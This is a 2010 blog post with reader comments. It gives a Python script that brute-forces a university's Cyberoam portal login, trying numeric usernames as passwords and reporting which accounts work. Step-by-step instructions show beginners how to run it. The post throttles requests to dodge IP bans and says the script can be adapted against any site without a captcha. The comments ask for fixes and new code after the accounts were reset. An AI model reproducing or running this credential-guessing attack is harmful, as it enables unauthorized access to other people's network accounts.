Sunday, January 31, 2010

CYBEROAM PROF ID's HACKING CODE

Lately I have been getting much amount of queries about  Prof ID's or IDs which have no limit on download or time restrictions. So I am giving out the code which I wrote to scan the IDs. Note that this code can be used to brute force any website (obviously without a captcha or image based identification system.) with some minor modifications and a good dictionary.



STEPS TO GET PROF ID's ( Ids with same numeric username and password)

1. Download Python IDE from http://www.python.org (not python.com !!!!). I have been using 2.5.1 and recommend the same.
2. Install normally
3. Open Notepad
4. Copy the following code in it or skip steps 2 n 3 n download the file from http://www.bitproxy.co.cc/data/cyberoam.py


-----------------COPY AFTER HERE----------------



# Cyberaom Prof IDs hacking code
# @author Abhishek Anand, BIT Mesra
# feel free to modify this code but do mail your code to:

codebase@bitproxy.co.cc

import urllib
import time

#this is the range of Ids to check
checkList = range(1,10000)

for i in checkList:
     userid =str(i)
     password= str(i)

     # here a post request is being made to the CyberoamHTTPClient servelet
     # for any other site view its form's source nd make a dictionary of

elements

     dataToSend = urllib.urlencode({'mode': '191','isAccessDenied': '', 'url':

'', 'username': userid, 'password': password, 'saveinfo': '',  })
     postRequest =

urllib.urlopen("http://172.16.1.1:8090/corporate/servlet/CyberoamHTTPClient",

dataToSend)
     responseData = postRequest.read()

     # reading the faltu string from the output to verify
     if not responseData.count('Make+sure+your+password+is+correct'):
          print userid
      # time to stop scanning before opening URL
          time.sleep(1)
          # here I m opening my Foxy's Updata File :P
          openURLToCheck =

urllib.urlopen("http://www.bitproxy.co.cc/data/file.txt")
          checkData = openURLToCheck.read()
          if checkData.count('2k8'):
               print '------------------------------------------'
               print ' ID FOUND !!!!!    ID FOUND !!!! ID FOUND!!!!'
               print '------------------------------------------'
               print password
    # stopping after 80 checks to prevent temporary IP banning by stupid

Cyberoam
     if i%80 == 0:
          print 'SCAN COMPLETED UPTO ' + str(i)
          time.sleep(3)


         
    
-----------------COPY UPTO HERE--------------------



5. Save the file with .py extension (e.g. hacker.py)
6. Now open the place where you have saved the file.
7. Right click on the file and select 'Edit with IDLE'
8. From the menu options run the program or press F5
9. The OUTPUT will generate both dead and working IDs.
10. ID FOUND !!! ID FOUND !!! means a working ID has been found.


**  You can implement the same thing in Java using Java.net.* libraries. but
it may take more lines of codes.
**  Please donot use this code on your friends IDs. :P

For any help feel free to mail me at:  opensource@bitproxy.co.cc

Abhishek Anand

9 comments:

  1. Hey Brother its not working! :(

    ReplyDelete
  2. Traceback (most recent call last):
    File "C:\Users\C.Sivakumar\Downloads\cyberoam.py", line 16, in
    postRequest = urllib.urlopen("http://1**.*.1.1:****/corporate/servlet/CyberoamHTTPClient", dataToSend)
    File "C:\Python26\lib\urllib.py", line 88, in urlopen
    return opener.open(url, data)
    File "C:\Python26\lib\urllib.py", line 207, in open
    return getattr(self, name)(url, data)
    File "C:\Python26\lib\urllib.py", line 344, in open_http
    h.endheaders()
    File "C:\Python26\lib\httplib.py", line 904, in endheaders
    self._send_output()
    File "C:\Python26\lib\httplib.py", line 776, in _send_output
    self.send(msg)
    File "C:\Python26\lib\httplib.py", line 735, in send
    self.connect()
    File "C:\Python26\lib\httplib.py", line 716, in connect
    self.timeout)
    File "C:\Python26\lib\socket.py", line 514, in create_connection
    raise error, msg
    IOError: [Errno socket error] [Errno 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond
    >>>

    ReplyDelete
  3. It works, shows "ID FOUND!" but there are no passwords listed.

    ReplyDelete
  4. Dude it keeps on sayin id found id found and no id or password is displayed!!

    ReplyDelete
  5. hii......bhaiyaa i m from ur college BIT MESRA ...plz kuch karo....cyberoam has been flushed again..sabka prod id gaaya ....u have any contact no ??

    ReplyDelete
  6. new code plz.. this is not workin anymore

    ReplyDelete
  7. bitproxy.co.cc yeh site down hai!

    # here I m opening my Foxy's Updata File :P
    openURLToCheck =

    urllib.urlopen("http://www.bitproxy.co.cc/data/file.txt")

    yeh url kisse change karun?

    ReplyDelete